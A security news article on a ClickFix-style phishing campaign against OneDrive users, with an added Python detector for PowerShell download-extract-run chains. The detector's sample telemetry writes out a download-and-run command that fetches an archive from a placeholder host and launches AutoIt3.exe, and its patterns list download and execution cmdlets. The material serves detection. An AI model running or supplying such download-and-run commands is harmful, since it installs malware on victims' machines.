A new phishing campaign targeting Microsoft OneDrive users has been observed, employing social engineering tactics to trick victims into executing malicious PowerShell scripts. The campaign exploits users’ urgency to access files and their trust in legitimate-seeming software interfaces.
OneDrive Phishing Campaign Attack Sequence
Researchers from Trellix observed that the campaign begins with an email containing an .html file, which, when opened, displays an image designed to create a sense of urgency about accessing a document. The image simulates a Microsoft OneDrive page displaying a file named “Reports.pdf” and a window titled “Error 0x8004de86” with an error message claiming that the “OneDrive” cloud service needs to be updated.
Two buttons, “Details” and “How to fix,” are presented, with the latter triggering a function call and loading secondary instructions. This combination of technical jargon and urgent error messages is a classic social engineering tactic, designed to manipulate the user’s emotions and prompt hasty action.
The attack sequence unfolds as follows: the user clicks the button that purportedly explains how to fix a supposed DNS issue, which loads the instructions that lead to the compromise of the system. The user is then told to open the Quick Link menu, launch a Windows PowerShell terminal and paste the supplied commands, presented as the steps for installing the OneDrive cloud service update. The pasted command downloads an archive file, extracts its contents, and executes a script using AutoIt3.exe.
Ultimately, the attack displays a success message, claiming that the operation has been completed.
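The chain described above (PowerShell launched interactively from the desktop, a pasted command that downloads an archive, expands it and runs a script through AutoIt3.exe) leaves a recognisable trail in PowerShell script-block logs and process-creation telemetry. The following detector is an added example, not code from Trellix or from the campaign; it assumes a simplified event record with source, image, parent and text fields (mirroring the ParentImage, Image and CommandLine fields of Sysmon or EDR process events, and the script text of PowerShell event 4104), and all sample records are constructed with a placeholder host name.

```python
"""Flag ClickFix-style PowerShell chains (download -> extract -> run via AutoIt3.exe)
in process-creation and script-block telemetry.

Added example for illustration; the event shape and sample records are constructed.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    source: str   # "process" (Sysmon 1 / Security 4688) or "scriptblock" (PowerShell 4104)
    image: str    # executable that ran (for scriptblock events: the PowerShell host)
    parent: str   # parent process image
    text: str     # process command line, or the logged script block text


# Each stage of the chain is matched independently so that a lone download
# (common in admin scripts) does not fire; the alert needs download plus a
# follow-on stage. Patterns are illustrative, not an exhaustive cmdlet list.
STAGES = {
    "download": re.compile(
        r"\b(iwr|invoke-webrequest|invoke-restmethod|downloadfile|downloadstring|"
        r"start-bitstransfer|curl|wget)\b", re.I),
    "extract": re.compile(r"\b(expand-archive|tar\s+-x|zipfile|extracttodirectory)\b", re.I),
    "execute": re.compile(r"\b(autoit3(\.exe)?|start-process|iex|invoke-expression)\b", re.I),
}
TEMP_PATH = re.compile(r"(\\temp\\|%temp%|\$env:temp|\\appdata\\local\\temp)", re.I)
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe")


def stages_in(text):
    """Return the set of chain stages whose pattern appears in the text."""
    return {name for name, rx in STAGES.items() if rx.search(text)}


def classify(ev):
    """Return a reason string if the event matches a ClickFix pattern, else None."""
    img = ev.image.lower()
    if img == "autoit3.exe":
        # The AutoIt interpreter is legitimate software; what is suspicious is
        # a shell launching it, or it running out of a temp directory.
        if ev.parent.lower() in SHELLS:
            return "AutoIt3 interpreter spawned by a shell"
        if TEMP_PATH.search(ev.text):
            return "AutoIt3 interpreter run from a temp directory"
        return None
    if img in ("powershell.exe", "pwsh.exe"):
        hit = stages_in(ev.text)
        if "download" in hit and hit & {"extract", "execute"}:
            return "PowerShell download-and-run chain: " + ", ".join(sorted(hit))
    return None


def detect(events):
    """Return (index, reason) pairs for every event that matches."""
    return [(i, r) for i, ev in enumerate(events) if (r := classify(ev))]


# Constructed sample telemetry (raw strings: Windows paths contain backslashes).
SAMPLE_EVENTS = [
    # The pasted command, as captured by script-block logging of an interactive
    # console that the user opened from the desktop shell.
    Event("scriptblock", "powershell.exe", "explorer.exe",
          r"iwr http://example.invalid/update.zip -OutFile $env:TEMP\u.zip; "
          r"Expand-Archive $env:TEMP\u.zip $env:TEMP\u; "
          r"Start-Process $env:TEMP\u\AutoIt3.exe $env:TEMP\u\s.a3x"),
    # The resulting child process.
    Event("process", "AutoIt3.exe", "powershell.exe",
          r"C:\Users\user\AppData\Local\Temp\u\AutoIt3.exe C:\Users\user\AppData\Local\Temp\u\s.a3x"),
    # Benign: scheduled script run.
    Event("process", "powershell.exe", "explorer.exe", r"powershell -File C:\scripts\backup.ps1"),
    # Benign: a plain download with no extract/execute stage.
    Event("scriptblock", "powershell.exe", "explorer.exe",
          r"iwr https://example.invalid/report.csv -OutFile report.csv"),
    # Benign: AutoIt used by a developer from its install directory.
    Event("process", "AutoIt3.exe", "explorer.exe",
          r"C:\Program Files\AutoIt3\AutoIt3.exe C:\tools\build.au3"),
]


if __name__ == "__main__":
    for idx, reason in detect(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{ev.source}] {ev.parent} -> {ev.image}: {reason}")
```

Running the block prints two alerts (the pasted chain and the AutoIt3 child of PowerShell) and stays silent on the three benign records. In a real deployment the same two signals map onto Sigma or EDR rules: script-block text combining a download cmdlet with Expand-Archive or Start-Process, and AutoIt3.exe with a shell parent or a user-writable path.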
Global Reach and Enterprise Implications
The campaign has affected users worldwide, with significant activity detected in the United States, India, and the United Kingdom. For businesses, this attack poses a serious threat. A single compromised employee could potentially lead to widespread network infiltration, data breaches, and financial losses.
To combat such attacks, organizations must:
- Implement robust employee training programs focused on recognizing phishing attempts.
- Enforce strict security protocols, including email filtering and attachment scanning.
- Regularly update and patch systems to close potential vulnerabilities.
- Foster a culture of cybersecurity awareness throughout the organization.
Campaigns of this nature, which attempt to trick users into executing malicious PowerShell scripts and often deliver malware such as remote access Trojans (RATs) and infostealers such as DarkGate, Lumma and Vidar, have been commonly dubbed ‘ClickFix’ or ‘ClearFake’ attacks by security researchers.